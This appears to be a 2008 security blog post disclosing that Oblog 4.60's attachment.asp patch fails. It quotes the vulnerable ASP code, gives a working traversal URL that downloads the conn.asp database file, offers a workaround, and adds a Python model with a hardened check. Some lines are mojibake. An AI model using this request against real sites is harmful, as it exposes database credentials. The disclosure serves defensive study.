Was it really patched? The Oblog vulnerability reappears
2008-05-01 22:14
Originally this gift was only shared with the friends in the BK瞬间 group, and I specifically said not to take it and use it against the official site. Unfortunately someone still went and tested it on the official site first, which was very depressing; I kicked that person and blacklisted him. Today I am releasing it for everyone.
########################################################################
Tr4c3[at]126[dot]com, written on [2008-4-29]
Copyright:
http://www.nspcn.org/
http://www.tr4c3.com/
Bk瞬间 [QQ group] & Hi [QQ group]
########################################################################
Program download: http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar
########################################################################
Description:

On April Fool's Day, 雕牌 published an Oblog arbitrary file download vulnerability on his blog. See the article at http://www.tr4c3.com/post/302.html, "<0day> An April Fool's gift: oblog file download vulnerability".
The Oblog version the vendor released afterwards made some small changes to the code, and a corresponding patch was published. See: http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=132375 [oblog46体验版_patch_20080403补丁]
A request such as http://www.target.com/attachment.asp?path=./conn.asp can no longer download the file. I downloaded the latest version, 4.60 Final Build080403 Access (which integrates the attachment.asp patch), from the vendor and found that the modified code does not actually solve the problem: the OBlog arbitrary file download vulnerability still exists. See the attachment.asp code for the details.
########################################################################
Key section:

Path = Trim(Request("path")) ' get the path submitted by the user
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
         Response.Write "参数不足"
         Response.End
End If
...
If CheckDownLoad Or 1=1 Then
         If Path = "" Then
                 set rs = Server.CreateObject("ADODB.RecordSet")
                 link_database
                 SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "&CLng(FileID))
                 rs.open sql,conn,1,3
                 If Not rs.Eof Then
                         uid = rs(1)
                         file_ext = rs(2)
                         rs("ViewNum") = rs("ViewNum") + 1
                         rs.Update
                         downloadFile Server.MapPath(rs(0)),0
                 Else
                         Response.Status=404
                         Response.Write "该附件不存在!"
                 End If
                 rs.Close
                 Set rs = Nothing
         Else
                 If InStr(path,Oblog.CacheConfig(56)) > 0 Then ' Tr4c3 note: this only checks whether the user-submitted path contains UploadFiles; if it does, downloadFile is called to send the file
                         downloadFile Server.MapPath(Path),1
                 End if
         End If
Else
         ' If the attachment is an image and the permission check fails, serve a default image instead, so that <img> tags still resolve and the page layout is not affected
         If Path = "" Then
                 Response.Status=403
                 Response.Write ShowDownErr
                 Response.End
         Else
                 downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
         End if
End if

Set oblog = Nothing

Sub downloadFile(strFile,stype)
         On Error Resume Next
         Server.ScriptTimeOut=9999999
         Dim S,fso,f,intFilelength,strFilename
         strFilename = strFile
         Response.Clear
         Set s = Server.CreateObject(oblog.CacheCompont(2))
         s.Open
         s.Type = 1
         Set fso = Server.CreateObject(oblog.CacheCompont(1))
         If Not fso.FileExists(strFilename) Then
                 If stype = 0 Then
                         Response.Status=404
                         Response.Write "该附件已经被删除!"
                         Exit Sub
                 Else
                         strFilename = Server.MapPath(blogdir&"images/nopic.gif")
                 End if
         End If
         Set f = fso.GetFile(strFilename)
         intFilelength = f.size
         s.LoadFromFile(strFilename)
         If Err Then
                  Response.Write("<h1>错误: </h1>" & Err.Description & "<p>")
                 Response.End
         End If
         Set fso=Nothing
         Dim Data
         Data=s.Read
         s.Close
         Set s=Nothing
         Dim ContentType
         select Case LCase(Right(strFile, 4))
         Case ".asp",".mdb",".config",".js" ' Tr4c3 note: does this look familiar? Right, the arbitrary download vulnerability in the 沸腾展望 news system I posted a few days ago [http://www.tr4c3.com/post/306.html] uses almost the same check, and the exploitation method is similar too: the magic "." comes into play again.
                 Exit Sub
         Case ".asf"
                 ContentType = "video/x-ms-asf"
         Case ".avi"
                 ContentType = "video/avi"
         Case ".doc"
                 ContentType = "application/msword"
         Case ".zip"
                 ContentType = "application/zip"
         Case ".xls"
                 ContentType = "application/vnd.ms-excel"
         Case ".gif"
                 ContentType = "image/gif"
         Case ".jpg", "jpeg"
                 ContentType = "image/jpeg"
         Case ".wav"
                 ContentType = "audio/wav"
         Case ".mp3"
                 ContentType = "audio/mpeg3"
         Case ".mpg", "mpeg"
                 ContentType = "video/mpeg"
         Case ".rtf"
                 ContentType = "application/rtf"
         Case ".htm", "html"
                 ContentType = "text/html"
         Case ".txt"
                 ContentType = "text/plain"
         Case Else
                 ContentType = "application/octet-stream"
         End select
         If Response.IsClientConnected Then
                 If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then
                         Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
                 End If
                 Response.AddHeader "Content-Length", intFilelength
                 Response.CharSet = "UTF-8"
                 Response.ContentType = ContentType
                 Response.BinaryWrite Data
                 Response.Flush
                 Response.Clear()
         End If
End Sub

########################################################################
Exploitation method:
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
ÐÞ²¹½¨Ò飺
µÈ´ý¹Ù·½·¢²¼ÐµIJ¹¶¡³ÌÐò¡£
########################################################################
Temporary workaround:
Change line 5 of attachment.asp from Path = Trim(Request("path")) to Path = Replace(Trim(Request("path")),"..","")
########################################################################
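The two checks discussed above, the patched attachment.asp test for "UploadFiles" in the path and downloadFile's Right(strFile, 4) blacklist, modelled side by side with a hardened variant. This is an added example, not code from the post or from Oblog; the web-root layout, the assumption that Oblog.CacheConfig(56) holds "UploadFiles", and the allowlist are constructed for the demonstration. The hardened check canonicalizes the path and confines it to the upload directory instead of stripping ".." substrings as the workaround does, and it judges the extension of the name Windows will actually open (trailing dots ignored).

```python
import posixpath
import re

# Constructed layout for this example: Server.MapPath in attachment.asp
# resolves the user path against the web root, so the model does the same.
WEB_ROOT = "/inetpub/oblog"
UPLOAD_DIR = posixpath.join(WEB_ROOT, "UploadFiles")
# Assumed: Oblog.CacheConfig(56) holds the upload folder name.
UPLOAD_MARKER = "UploadFiles"

# The blacklist from downloadFile, compared against LCase(Right(strFile, 4)).
BLACKLIST = (".asp", ".mdb", ".config", ".js")
# Hardened variant: serve only known attachment types (allowlist, constructed).
ALLOWLIST = {".gif", ".jpg", ".jpeg", ".png", ".bmp", ".zip", ".rar", ".doc",
             ".xls", ".rtf", ".txt", ".mp3", ".wav", ".avi", ".mpg", ".asf"}


def vulnerable_allows(path: str) -> bool:
    """Model of the patched attachment.asp check followed by downloadFile's
    extension check. Returns True when the file would be sent."""
    if UPLOAD_MARKER not in path:          # InStr(path, Oblog.CacheConfig(56)) > 0
        return False
    tail = path[-4:].lower()               # LCase(Right(strFile, 4)): only 4 chars
    # ".config" can never equal a 4-char tail, and "conn.asp." ends in "asp.",
    # so a trailing dot passes the blacklist while Windows still opens conn.asp.
    return tail not in BLACKLIST


def hardened_allows(path: str) -> bool:
    """Canonicalize, confine to the upload directory, then allowlist the
    extension of the name the file system will actually open."""
    p = path.replace("\\", "/")
    if p.startswith("/") or re.match(r"^[A-Za-z]:", p):
        return False                       # absolute or drive-letter paths
    full = posixpath.normpath(posixpath.join(WEB_ROOT, p))
    if not full.startswith(UPLOAD_DIR + "/"):
        return False                       # "../" escaped the upload directory
    # Windows ignores trailing dots and spaces in file names, so strip them
    # before looking at the extension rather than trusting the raw request.
    name = posixpath.basename(full).rstrip(". ")
    ext = posixpath.splitext(name)[1].lower()
    return ext in ALLOWLIST
```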

Category: Network security | Comments (2)
 
×î½ü¶ÁÕߣº
 
Reader comments:
1
2008-05-02 16:05
ooo, i see.
 
2
2008-05-03 17:07
Mm.
 
©2008 Baidu